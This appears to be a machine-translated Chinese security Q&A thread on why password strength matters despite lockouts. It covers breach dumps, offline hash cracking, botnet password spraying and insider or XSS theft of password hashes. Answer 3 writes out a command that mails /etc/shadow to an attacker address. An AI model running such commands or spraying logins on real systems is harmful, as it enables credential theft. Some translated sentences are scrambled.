为什么密码强度很重要？

Question

我从密码学的角度了解到，您希望密码尽可能随机，以抵抗蛮力或字典攻击。这很好--但是在什么情况下才能真正采取这些方法呢？几乎每一个系统我都有过一个密码，如果你输入了几个错误的猜测，就会把你锁在外面。我们正在观察数以百万计的猜测，即使是非常弱的密码，这在这些类型的系统上似乎是不可能的。

除了社会工程之外，人们如何攻击密码呢？

Answer 1

对社交媒体应用开发者RockYou上个月泄露的3200万个密码的分析进一步证明，消费者通常使用容易猜测的登录凭据.敏感的登录凭据(以纯文本形式存储)由于RockYou网站中的SQL注入错误而被公开。 大约130万注册用户的电子邮件和密码--包括Gawker Media所有者Nick Denton及其员工的邮件和密码--被访问并随后在网上公布. 2012年年6月5日，社交网站LinkedIn遭到黑客攻击，近650万个用户账户的密码被盗 一个自称D33Ds公司的黑客集体公开发布了超过45万个登录凭证--即配对用户名和密码--来自雅虎的“贡献者网络”网站. 这一切都始于Adobe报告了300多万客户的信息(包括密码识别信息)被泄露，然后将这个数字增加到3800万。上周，当一家外部公司在网络罪犯经常光顾的网站上发现约1.52亿Adobe客户的数据时，情况变得更糟了. 污损了avadas.de，然后在网上丢弃了黑客声称的客户详细信息)土耳其黑客Maxn3y在周六(这里的档案.据称泄露的信息包括shop.avadas.de域的不完整配置文件、使用加密密码的可信管理员登录细节(最严重的是)，以及安全专家认为的大约20,000名消费者的PayPal支付信息.据分析数据转储的Cyberwarnews.info称，黑客还盗取了客户的电子邮件地址、用户名、加密密码以及某些银行和支付细节。 数千名特易购客户的电子邮件和密码发布在网上，黑客掌握了他们的登录细节。

…

在密码数据库被泄露之前，依赖密码攻击的速率限制是很好的。

当密码数据库是明文时，游戏就结束了。只有在不同的站点上不重用相同的密码(或容易修改的密码，如swordfish!Yahoo和swordfish!Tesco)，就不能通过拥有强密码来减轻这一问题。

当密码数据库被散列时，攻击者需要一段时间才能运行脱机搜索并找到密码。密码越强，哈希越更好，攻击者需要的时间就越长。如果您的密码足够强，那么您可能有机会在任何攻击者找到您的密码之前更改您的密码。这使用户处于竞争状态:最薄弱的密码将首先被利用。即使在这种情况下，您也需要在任何地方更改密码，这强烈支持真正的站点唯一密码。

Answer 2

让我们假设您有一个僵尸网络，可以在许多唯一的客户端IP上分发登录尝试(这足以让人简单地对您进行防火墙)，并且您希望使用您的僵尸网络来通过蛮力猜测popularwebsite.com上的正确登录。我们还假设在5次错误的登录尝试之后，popularwebsite.com会锁定用户帐户。

没问题。打开僵尸网络，每秒从一组广泛分散的源IP中抛出1000次登录尝试。每次登录尝试都使用最常见的密码之一(123456、password等)，并尝试使用该密码猜测用户帐户。(如果他们有一个电子邮件地址数据库来获取想法，那应该很容易。)如果您没有足够快地猜到正确的用户，那么popularwebsite.com是否停止接受使用该密码的所有登录尝试？我怀疑!

那么，我们在这里的前景如何呢？首先让我们做一些假设：

• 我们猜测实际存在的20%的用户帐户名称(影响这一数字的因素包括帐户总数、用户帐户与电子邮件地址之间的相关性、电子邮件数据库的质量)
• 4.7%的用户使用password作为他们的密码

这意味着，如果我们每次都尝试使用password作为密码，那么单个个人猜到的登录正确的概率是：

47 / (1000 * 5) = 0.94%

因此，如果我们在猜测实际用户帐户方面有20%的效果，那么我们每106次尝试就会得到一次成功，或者使用我们想象中的僵尸网络每秒10次成功。这是没有任何服务器端妥协或利用，只是猜测登录。如果我们的僵尸网络运行在用户的家用电脑上，目标可以阻止攻击的唯一方法是强迫4.7%的用户更改密码，这会把他们中的一些人赶走，我们就从123456重新开始。

但是，如果人们使用的密码没有其他人使用，这是远远没有那么容易使这一攻击得到回报。

Answer 3

有恶意意图的人可以通过以下方法窃取敏感信息(即密码)。

• 宿主入侵

这个恶意黑客以3个月的合同为受攻击的公司雇用开发人员，并在服务器上以有限的权限获得一个shell帐户，我要求系统管理员检查一个妨碍我工作的未知问题。我成功地说服了他/她给我一个由我写了5分钟的shell脚本的根特权，因为它有助于定制工作环境，并且大大加快了我的项目。由于他忙于其他事情，10分钟内有个会议，所以他给了我10分钟的自定义脚本的root特权。我已经设置了一个陷阱，恶意脚本是以根权限运行的，它将/etc/shadow文件发送到我公司的电子邮件帐户。几周后，我将批准我的VPN访问，我将VPN从我的家庭机器，我将从我的公司电子邮件复制/粘贴到我的家庭桌面。我得到了密码哈希。

• 未经批准的对工作站的实际访问

一名恶意黑客受雇于清洁行业，为该公司分包合同，而该公司正受到攻击。他被授权进入IT部门的办公场所，包括系统管理员或首席开发人员办公室。他在便条上查找密码或敏感信息，或试图找到未上锁的工作站等。他迟早会找到的。想象一下系统管理员的开放终端，他在匆忙离开家后，不小心把shell终端打开了。当然，sudo root access的特权仍然是开放的，因为他忘了锁上自己的workstation...while --他正在清理桌子，刷掉键盘上的灰尘，环顾四周，没有人在看，整个办公室都是空的，所有人都回家过了一天。他快速输入cat /etc/shadow | mail hacker@anonymous.net并获得密码哈希。

• XSS攻击

针对保护不佳的web服务器，恶意黑客设法运行XSS脚本，其中代码注入运行一个命令，该命令向他发送名为/root/my.cnf的文件，系统管理员自从设置带有MySQL的web服务器以来就忘记删除该文件。他认为他的主目录无论如何都是安全的，所以他认为从root的家里删除包括密码在内的文件并不是一个高优先级。MySQL密码恰好与机器上的root密码相同。使用根密码，获取其他更受保护的服务器密码的其他敏感信息并不意味着要完成这项任务。

以上的方法，我相信不是社会工程。希望这有助于扩大你的想象力:)